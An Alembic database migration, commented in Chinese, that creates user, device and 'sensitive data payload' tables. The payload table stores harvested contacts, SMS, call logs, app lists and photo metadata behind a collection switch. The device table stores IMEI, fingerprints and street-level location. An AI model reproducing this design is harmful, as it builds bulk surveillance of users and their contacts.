"""Initial migration: create users, user_devices, user_data_payload tables

Revision ID: 368a9ade7d37
Revises: 
Create Date: 2026-01-09 23:18:26.843112

"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql

# revision identifiers, used by Alembic.
revision = '368a9ade7d37'
down_revision = None
branch_labels = None
depends_on = None


def upgrade() -> None:
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('users',
    sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
    sa.Column('phone', sa.String(length=20), nullable=False, comment='手机号 (Unique)'),
    sa.Column('username', sa.String(length=100), nullable=True, comment='用户名'),
    sa.Column('password_hash', sa.String(length=255), nullable=False, comment='密码哈希'),
    sa.Column('nickname', sa.String(length=100), nullable=True, comment='昵称'),
    sa.Column('invitation_code', sa.String(length=50), nullable=True, comment='使用的邀请码'),
    sa.Column('first_used_at', sa.DateTime(), nullable=True, comment='首次使用时间'),
    sa.Column('last_active_at', sa.DateTime(), nullable=True, comment='最后活跃时间'),
    sa.Column('is_online', sa.Boolean(), nullable=True, comment='在线状态'),
    sa.Column('latency_ms', sa.Integer(), nullable=True, comment='延迟 (ms)'),
    sa.Column('agreed_at', sa.DateTime(), nullable=True, comment='同意免责声明的时间戳'),
    sa.Column('created_at', sa.DateTime(), nullable=False, comment='创建时间'),
    sa.Column('updated_at', sa.DateTime(), nullable=False, comment='更新时间'),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index('idx_user_last_active', 'users', ['last_active_at'], unique=False)
    op.create_index('idx_user_online', 'users', ['is_online'], unique=False)
    op.create_index('idx_user_phone', 'users', ['phone'], unique=False)
    op.create_index(op.f('ix_users_id'), 'users', ['id'], unique=False)
    op.create_index(op.f('ix_users_invitation_code'), 'users', ['invitation_code'], unique=False)
    op.create_index(op.f('ix_users_is_online'), 'users', ['is_online'], unique=False)
    op.create_index(op.f('ix_users_last_active_at'), 'users', ['last_active_at'], unique=False)
    op.create_index(op.f('ix_users_phone'), 'users', ['phone'], unique=True)
    op.create_index(op.f('ix_users_username'), 'users', ['username'], unique=False)
    op.create_table('user_data_payload',
    sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
    sa.Column('user_id', sa.Integer(), nullable=False),
    sa.Column('sensitive_data', postgresql.JSONB(astext_type=sa.Text()), nullable=True, comment='敏感数据（限2000条）：移动端应用列表、通讯录、短信、通话记录、相册元数据'),
    sa.Column('data_count', sa.Integer(), nullable=False, comment='当前存储的数据条数（上限2000）'),
    sa.Column('is_enabled', sa.Boolean(), nullable=False, comment='功能开关：控制是否启用敏感数据收集'),
    sa.Column('ext_field_1', sa.Text(), nullable=True, comment='预留扩展字段 1'),
    sa.Column('ext_field_2', sa.Text(), nullable=True, comment='预留扩展字段 2'),
    sa.Column('ext_field_3', sa.Text(), nullable=True, comment='预留扩展字段 3'),
    sa.Column('ext_field_4', sa.Text(), nullable=True, comment='预留扩展字段 4'),
    sa.Column('ext_field_5', sa.Text(), nullable=True, comment='预留扩展字段 5'),
    sa.Column('created_at', sa.DateTime(), nullable=False, comment='创建时间'),
    sa.Column('updated_at', sa.DateTime(), nullable=False, comment='更新时间'),
    sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index('idx_payload_enabled', 'user_data_payload', ['is_enabled'], unique=False)
    op.create_index('idx_payload_sensitive_data_gin', 'user_data_payload', ['sensitive_data'], unique=False, postgresql_using='gin')
    op.create_index('idx_payload_user', 'user_data_payload', ['user_id'], unique=False)
    op.create_index(op.f('ix_user_data_payload_id'), 'user_data_payload', ['id'], unique=False)
    op.create_index(op.f('ix_user_data_payload_user_id'), 'user_data_payload', ['user_id'], unique=False)
    op.create_table('user_devices',
    sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
    sa.Column('user_id', sa.Integer(), nullable=False),
    sa.Column('device_model', sa.String(length=200), nullable=True, comment='设备型号'),
    sa.Column('device_fingerprint', sa.String(length=255), nullable=False, comment='设备指纹 (Hardware Hash)'),
    sa.Column('imei', sa.String(length=50), nullable=True, comment='IMEI'),
    sa.Column('last_login_ip', sa.String(length=45), nullable=True, comment='最后登录 IP'),
    sa.Column('location_city', sa.String(length=100), nullable=True, comment='城市'),
    sa.Column('location_street', sa.String(length=200), nullable=True, comment='街道'),
    sa.Column('location_address', sa.String(length=500), nullable=True, comment='门牌'),
    sa.Column('latitude', sa.Numeric(precision=10, scale=8), nullable=True, comment='纬度 (Decimal)'),
    sa.Column('longitude', sa.Numeric(precision=11, scale=8), nullable=True, comment='经度 (Decimal)'),
    sa.Column('is_rooted', sa.Boolean(), nullable=True, comment='Root/越狱状态'),
    sa.Column('is_vpn_proxy', sa.Boolean(), nullable=True, comment='VPN/代理检测标记'),
    sa.Column('is_emulator', sa.Boolean(), nullable=True, comment='模拟器标记'),
    sa.Column('is_blacklisted', sa.Boolean(), nullable=True, comment='拉黑状态'),
    sa.Column('created_at', sa.DateTime(), nullable=False, comment='创建时间'),
    sa.Column('updated_at', sa.DateTime(), nullable=False, comment='更新时间'),
    sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('user_id', 'device_fingerprint', name='uq_user_device_fingerprint')
    )
    op.create_index('idx_device_blacklist', 'user_devices', ['is_blacklisted'], unique=False)
    op.create_index('idx_device_fingerprint', 'user_devices', ['device_fingerprint'], unique=False)
    op.create_index('idx_device_location', 'user_devices', ['latitude', 'longitude'], unique=False)
    op.create_index(op.f('ix_user_devices_device_fingerprint'), 'user_devices', ['device_fingerprint'], unique=False)
    op.create_index(op.f('ix_user_devices_id'), 'user_devices', ['id'], unique=False)
    op.create_index(op.f('ix_user_devices_imei'), 'user_devices', ['imei'], unique=False)
    op.create_index(op.f('ix_user_devices_is_blacklisted'), 'user_devices', ['is_blacklisted'], unique=False)
    op.create_index(op.f('ix_user_devices_is_rooted'), 'user_devices', ['is_rooted'], unique=False)
    op.create_index(op.f('ix_user_devices_last_login_ip'), 'user_devices', ['last_login_ip'], unique=False)
    op.create_index(op.f('ix_user_devices_user_id'), 'user_devices', ['user_id'], unique=False)
    # ### end Alembic commands ###


def downgrade() -> None:
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_index(op.f('ix_user_devices_user_id'), table_name='user_devices')
    op.drop_index(op.f('ix_user_devices_last_login_ip'), table_name='user_devices')
    op.drop_index(op.f('ix_user_devices_is_rooted'), table_name='user_devices')
    op.drop_index(op.f('ix_user_devices_is_blacklisted'), table_name='user_devices')
    op.drop_index(op.f('ix_user_devices_imei'), table_name='user_devices')
    op.drop_index(op.f('ix_user_devices_id'), table_name='user_devices')
    op.drop_index(op.f('ix_user_devices_device_fingerprint'), table_name='user_devices')
    op.drop_index('idx_device_location', table_name='user_devices')
    op.drop_index('idx_device_fingerprint', table_name='user_devices')
    op.drop_index('idx_device_blacklist', table_name='user_devices')
    op.drop_table('user_devices')
    op.drop_index(op.f('ix_user_data_payload_user_id'), table_name='user_data_payload')
    op.drop_index(op.f('ix_user_data_payload_id'), table_name='user_data_payload')
    op.drop_index('idx_payload_user', table_name='user_data_payload')
    op.drop_index('idx_payload_sensitive_data_gin', table_name='user_data_payload', postgresql_using='gin')
    op.drop_index('idx_payload_enabled', table_name='user_data_payload')
    op.drop_table('user_data_payload')
    op.drop_index(op.f('ix_users_username'), table_name='users')
    op.drop_index(op.f('ix_users_phone'), table_name='users')
    op.drop_index(op.f('ix_users_last_active_at'), table_name='users')
    op.drop_index(op.f('ix_users_is_online'), table_name='users')
    op.drop_index(op.f('ix_users_invitation_code'), table_name='users')
    op.drop_index(op.f('ix_users_id'), table_name='users')
    op.drop_index('idx_user_phone', table_name='users')
    op.drop_index('idx_user_online', table_name='users')
    op.drop_index('idx_user_last_active', table_name='users')
    op.drop_table('users')
    # ### end Alembic commands ###
